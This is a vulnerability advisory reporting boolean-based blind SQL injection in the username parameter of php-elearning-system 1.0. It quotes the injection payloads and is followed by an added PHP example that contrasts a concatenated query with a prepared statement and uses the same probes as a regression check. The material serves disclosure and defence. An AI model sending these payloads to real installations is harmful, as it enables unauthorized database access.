Source: packetstormsecurity.com (PACKETSTORM:173003), posted by nu11secur1ty
Published: Jun 19, 2023 - 12:00 a.m.

elearning-SES 1.0 Sql Injection

`## Title: elearning-SES (by: oretnom23 ) v1.0 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 06.14.2023  
## Vendor: https://github.com/oretnom23  
## Software: https://github.com/oretnom23/php-elearning-system  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The username parameter appears to be vulnerable to SQL injection  
attacks. The payloads 73152795' or 7515=7515-- and 13684562' or  
3996=3998-- were each submitted in the username parameter. These two  
requests produced different responses, which indicates that the input is  
incorporated into a SQL query unsafely. An attacker can use this to  
read all information in the database of this system.  
  
STATUS: HIGH-CRITICAL Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: username (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: username=-5075' OR 6057=6057-- JyxE&password=s8S!g3w!I2  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/elearning_1)  
  
## Proof and Exploit:  
[href]()  
  
## Time spent:  
01:15:00  
  
  
`
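
The differential described above, and the fix for it, as an added example that is not code from php-elearning-system or from the advisory author. The `users` table, its columns, the function names and the response strings are assumptions, and an in-memory SQLite database stands in for the application's MySQL backend. It sends the two probe strings quoted in the description through a concatenated query and through a prepared statement, then compares the responses.

```php
<?php
// Added example: hypothetical login handler, not code from php-elearning-system.
// Table/column names are assumptions; in-memory SQLite stands in for MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
$pdo->prepare('INSERT INTO users VALUES (?, ?)')
    ->execute(['alice', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

// Unsafe pattern: the username is concatenated into the SQL text.
function login_concat(PDO $pdo, string $username, string $password): string
{
    $sql = "SELECT password_hash FROM users WHERE username = '$username'";
    $hash = $pdo->query($sql)->fetchColumn();
    if ($hash === false) {
        return 'unknown user';
    }
    return password_verify($password, $hash) ? 'ok' : 'wrong password';
}

// Hardened: the username is bound as data and cannot alter the query.
function login_prepared(PDO $pdo, string $username, string $password): string
{
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();
    // One generic failure message, so the response carries no true/false signal.
    return ($hash !== false && password_verify($password, $hash)) ? 'ok' : 'invalid credentials';
}

// The two probe strings quoted in the advisory's description.
$probes = ["73152795' or 7515=7515-- ", "13684562' or 3996=3998-- "];
foreach (['login_concat', 'login_prepared'] as $fn) {
    $responses = [];
    foreach ($probes as $probe) {
        $responses[] = $fn($pdo, $probe, 'x');
    }
    $differs = $responses[0] !== $responses[1];
    printf("%-15s %-40s %s\n", $fn, implode(' / ', $responses),
        $differs ? 'responses differ: input reaches the SQL text' : 'responses identical');
}
```

The same pair of probes works as a regression check after patching: once the parameter is bound, both requests must produce the same response.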